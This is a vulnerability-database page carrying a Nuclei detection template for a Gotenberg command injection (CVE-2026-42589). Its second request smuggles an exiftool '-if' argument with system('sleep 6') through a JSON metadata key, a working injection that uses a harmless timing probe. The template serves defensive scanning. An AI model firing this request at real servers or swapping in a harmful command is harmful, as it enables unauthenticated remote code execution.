Lucene search
K

Gotenberg - Command Injection

🗓️ 05 Jul 2026 03:01:21Reported by ProjectDiscoveryType 
nuclei
 nuclei
🔗 github.com👁 16 Views

Gotenberg before 8.31.0 allows unauthenticated command execution via unvalidated metadata keys.

Related
Refs
Code
id: CVE-2026-42589

info:
  name: Gotenberg - Command Injection
  author: fineman999
  severity: critical
  description: |
    Gotenberg < 8.31.0 contains a command injection caused by lack of validation on JSON metadata keys in /forms/pdfengines/metadata/write endpoint, letting unauthenticated attackers execute OS commands, exploit requires crafted HTTP request.
  impact: |
    Unauthenticated attackers can execute arbitrary OS commands remotely, potentially leading to full system compromise.
  remediation: |
    Update to version 8.31.0 or later.
  reference:
    - https://github.com/gotenberg/gotenberg/security/advisories/GHSA-rqgh-gxv4-6657
    - https://github.com/gotenberg/gotenberg/releases/tag/v8.31.0
    - https://nvd.nist.gov/vuln/detail/CVE-2026-42589
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2026-42589
    epss-score: 0.0295
    epss-percentile: 0.85492
    cwe-id: CWE-78
  metadata:
    verified: true
    vendor: gotenberg
    product: gotenberg
    max-request: 2
  tags: cve,cve2026,gotenberg,exiftool,rce,unauth,vkev

flow: http(1) && http(2)

http:
  - raw:
      - |
        GET /version HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: dsl
        dsl:
          - 'compare_versions(version, "< 8.31.0")'
          - 'contains(to_lower(header), "gotenberg")'
          - 'status_code == 200'
        condition: and
        internal: true

    extractors:
      - type: regex
        name: version
        part: body
        group: 1
        regex:
          - "([0-9.]+)"
        internal: true

  - raw:
      - |
        @timeout: 10s
        POST /forms/pdfengines/metadata/write HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundary{{randstr}}

        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="files"; filename="sample.pdf"
        Content-Type: application/pdf

        %PDF-1.1
        1 0 obj
        << /Type /Catalog /Pages 2 0 R >>
        endobj
        2 0 obj
        << /Type /Pages /Kids [3 0 R] /Count 1 >>
        endobj
        3 0 obj
        << /Type /Page /Parent 2 0 R /MediaBox [0 0 200 200] >>
        endobj
        xref
        0 4
        0000000000 65535 f
        0000000009 00000 n
        0000000058 00000 n
        0000000115 00000 n
        trailer
        << /Root 1 0 R /Size 4 >>
        startxref
        186
        %%EOF
        ------WebKitFormBoundary{{randstr}}
        Content-Disposition: form-data; name="metadata"

        {"Title\n-if\nsystem('sleep 6')||1\n-Comment":"x"}
        ------WebKitFormBoundary{{randstr}}--

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "status_code == 500"
          - "duration >= 6"
        condition: and
# digest: 4a0a00473045022100d64f033f12b352184718e836b3df04fa89d633a3b359901baeca34b45f2665d502207d7b2198cd40c343efd5655993da4f3069a231251133ea8e6ff6068a3bd5ab08:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

30 May 2026 07:38Current
6Medium risk
Vulners AI Score6
CVSS 3.19.8
EPSS0.0295
SSVC
16